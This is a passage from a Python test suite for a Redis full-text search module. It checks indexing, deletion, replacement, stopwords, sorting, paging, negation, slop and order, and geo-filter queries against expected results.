'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
def testDelete(env):
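# FT.DEL should remove a doc from the index; the DD flag should also delete the underlying hash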
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
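# Adding an existing doc should fail without REPLACE; REPLACE should reindex the new content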
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
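# FT.DROP should delete the index and its document keys, unless KEEPDOCS is given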
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test was taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
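# Optional (~) terms should not filter out documents that lack them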
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
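# REPLACE PARTIAL should update only the supplied fields, score and payload,
# leaving the other indexed fields intact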
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non-indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating an indexed field does affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating the score without updating any fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
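# LIMIT paging should cover the whole result set; invalid offsets and sizes should raise errors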
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
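# SORTBY on sortable text and numeric fields, in both directions, including WITHSORTKEYS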
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non-existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# NOT on a term contained in every document should yield no results
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (baz gaz))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar (foo bar) (foo bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (foo (bar baz (gaz)))', 'nocontent'),
r.execute_command('ft.search', 'idx', 'foo (foo (bar (baz (gaz (foo bar (gaz))))))', 'nocontent')]
for i, r in enumerate(res):
# print i, res[0], r
env.assertListEqual(res[0], r)
def testInKeys(env):
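# INKEYS should restrict results to the given set of document keys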
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
for i in range(200):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world'))
for _ in r.retry_with_rdb_reload():
for keys in (
['doc%d' % i for i in range(10)], ['doc%d' % i for i in range(0, 30, 2)], [
'doc%d' % i for i in range(99, 0, -5)]
):
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', len(keys), *keys)
env.assertEqual(len(keys), res[0])
env.assertTrue(all((k in res for k in keys)))
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 'hello world', 'NOCONTENT', 'LIMIT', 0, 100, 'INKEYS', 3, 'foo', 'bar', 'baz')[0])
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', 99)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'INKEYS', -1)
with env.assertResponseError():
env.cmd('ft.search', 'idx', 'hello', 'inkeys', 4, 'foo')
def testSlopInOrder(env):
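# SLOP and INORDER should control the allowed distance and relative order of query terms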
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1, 'fields',
'title', 't1 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1, 'fields',
'title', 't1 t3 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3', 1, 'fields',
'title', 't1 t3 t4 t2'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc4', 1, 'fields',
'title', 't1 t3 t4 t5 t2'))
res = r.execute_command(
'ft.search', 'idx', 't1|t4 t3|t2', 'slop', '0', 'inorder', 'nocontent')
env.assertEqual({'doc3', 'doc4', 'doc2', 'doc1'}, set(res[1:]))
res = r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't2 t1', 'slop', '0', 'inorder')[0])
env.assertEqual(1, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '0', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '1', 'inorder')[0])
env.assertEqual(3, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '2', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'slop', '3', 'inorder')[0])
env.assertEqual(4, r.execute_command(
'ft.search', 'idx', 't1 t2', 'inorder')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't t1', 'inorder')[0])
env.assertEqual(2, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4')[0])
env.assertEqual(0, r.execute_command(
'ft.search', 'idx', 't1 t2 t3 t4', 'inorder')[0])
def testExact(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
res = r.execute_command(
'ft.search', 'idx', '"hello world"', 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc1", res[1])
res = r.execute_command(
'ft.search', 'idx', "hello \"another world\"", 'verbatim')
env.assertEqual(3, len(res))
env.assertEqual(1, res[0])
env.assertEqual("doc2", res[1])
def testGeo(env):
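# GEOFILTER and the inline @field:[lon lat radius unit] syntax should return identical results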
r = env
gsearch = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', query, 'geofilter', 'location', lon, lat, dist, unit)
gsearch_inline = lambda query, lon, lat, dist, unit='km': r.execute_command(
'ft.search', 'idx', '{} @location:[{} {} {} {}]'.format(query, lon, lat, dist, unit))
env.assertOk(r.execute_command('ft.create', 'idx',
'schema', 'name', 'text', 'location', 'geo'))
for i, hotel in enumerate(hotels):
env.assertOk(r.execute_command('ft.add', 'idx', 'hotel{}'.format(i), 1.0, 'fields', 'name',
hotel[0], 'location', '{},{}'.format(hotel[2], hotel[1])))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hilton')
env.assertEqual(len(hotels), res[0])
res = gsearch('hilton', "-0.1757", "51.5156", '1')
print res
env.assertEqual(3, res[0])
env.assertEqual('hotel2', res[5])
env.assertEqual('hotel21', res[3])
env.assertEqual('hotel79', res[1])
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '1')
env.assertListEqual(res, res2)
res = gsearch('hilton', "-0.1757", "51.5156", '10')
env.assertEqual(14, res[0])
env.assertEqual('hotel93', res[1])
env.assertEqual('hotel92', res[3])
env.assertEqual('hotel79', res[5])
res2 = gsearch('hilton', "-0.1757", "51.5156", '10000', 'm')
env.assertListEqual(res, res2)
res2 = gsearch_inline('hilton', "-0.1757", "51.5156", '10')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'm')
env.assertEqual(1, res[0])
env.assertEqual('hotel94', res[1])
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'm')
env.assertListEqual(res, res2)
res = gsearch('heathrow', -0.44155, 51.45865, '10', 'km')
env.assertEqual(5, res[0])
env.assertIn('hotel94', res)
res2 = gsearch_inline(
'heathrow', -0.44155, 51.45865, '10', 'km')
env.assertListEqual(res, res2)
